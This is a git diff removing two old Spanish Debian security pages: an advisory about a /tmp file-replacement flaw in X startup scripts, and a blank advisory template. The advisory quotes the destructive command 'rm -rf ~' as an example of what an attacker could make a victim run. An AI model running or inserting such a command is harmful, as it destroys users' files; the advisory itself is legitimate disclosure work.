b/spanish/security/info/xfree3.html deleted file mode 100644 index e5b4bfae128..00000000000 --- a/spanish/security/info/xfree3.html +++ /dev/null @@ -1,29 +0,0 @@ -<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> -<!--translation 1.1.1.1--> -<HTML> -<HEAD> - -<TITLE>Debian GNU/Linux - Información sobre Seguridad</TITLE> -<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> -<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> -</HEAD> - -<BODY BGCOLOR="#FFFFFF"> - - -<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Información sobre seguridad</H1> -<HR> -Debian considera la seguridad como algo muy serio. La mayoría de los <a href="../index.html">problemas sobre seguridad</a> recibidos a nuestra atención son corregidos en 48 horas. - -<blockquote> -Los scripts de arranque de X a veces construyen un fichero de comandos a ejecutar en el directorio /tmp. Otro usuario puede cambiar ese fichero por otro, causando que la víctima ejecute cualquier cosa (como rm -rf ~) -</blockquote> - -<P><SMALL>Ultima modificación: 10 de Enero de 1998. -Copyright ©1997, 1998 SPI; Vea -<A HREF="../../license.html">condiciones de la licencia.</A></SMALL> -<HR> -</BODY> -</HTML> - - diff --git a/spanish/security/template.html b/spanish/security/template.html deleted file mode 100644 index a85e175f14a..00000000000 --- a/spanish/security/template.html +++ /dev/null @@ -1,81 +0,0 @@ -!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> -<!--translation 1.1.1.1--> -<HTML> -<HEAD> -<TITLE>Debian GNU/Linux - Información sobre Seguridad</TITLE> -<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> -<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> -</HEAD> - -<BODY BGCOLOR="#FFFFFF"> - -<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Información sobre seguridad</H1> -<HR> - -<P> Por favor, mande noticias de fallos sobre seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P> - -<DL> -<DT>Fecha de notificación: no-publico - ; publico - -<P> -<DT>Paquetes afectados: -<P> -<DT>Breve descripción: - <DD> -<P> -<DT>Vulnerable: <FONT COLOR="#FF0000">Si</FONT> -<P> -<DT>Corregido en: - <DD> -<HR> - <DD>Ficheros fuente: - <DD>http://ftp.debian.org/debian/ - <DD><SMALL>(MD5 checksum: )</SMALL> - <DD>http://ftp.debian.org/debian/ - <DD><SMALL>(MD5 checksum: )</SMALL> - <DD>http://ftp.debian.org/debian/ - <DD><SMALL>(MD5 checksum: )</SMALL><P> - - <DD>Arquitectura Intel: - <DD>http://ftp.debian.org/debian/ - <DD><SMALL>(MD5 checksum: )</SMALL> -<P> -<DT>Corregido en: - <DD> -<HR> - <DD>Ficheros fuente: - <DD>http://ftp.debian.org/debian/ - <DD><SMALL>(MD5 checksum: )</SMALL> - <DD>http://ftp.debian.org/debian/ - <DD><SMALL>(MD5 checksum: )</SMALL> - <DD>http://ftp.debian.org/debian/ - <DD><SMALL>(MD5 checksum: )</SMALL> - -<P> Arquitectura Intel: - <DD>http://ftp.debian.org/debian/ - <DD><SMALL>(MD5 checksum: )</SMALL> - -<P> Arquitectura Motorola 68k: - <DD>http://ftp.debian.org/debian/ - <DD><SMALL>(MD5 checksum: )</SMALL> - -<P> Arquitectura Sparc: - <DD>http://ftp.debian.org/debian/ - <DD><SMALL>(MD5 checksum: )</SMALL> - -<P> Arquitectura Alpha: - <DD>http://ftp.debian.org/debian/ - <DD><SMALL>(MD5 checksum: )</SMALL> - -<P> Arquitectura PowerPC: - <DD>http://ftp.debian.org/debian/ - <DD><SMALL>(MD5 checksum: )</SMALL> -<P> -<DT>Fecha de entrada en Distribución: 19 de Abril de 1998 -</DL> - -<P><SMALL>Ultima modificación: 11 de Mayo de 1998. -Copyright ©1997, 1998 SPI; Vea -<A HREF="../license.html">condiciones de la licencia.</A></SMALL> -<HR> -</BODY> -</HTML> |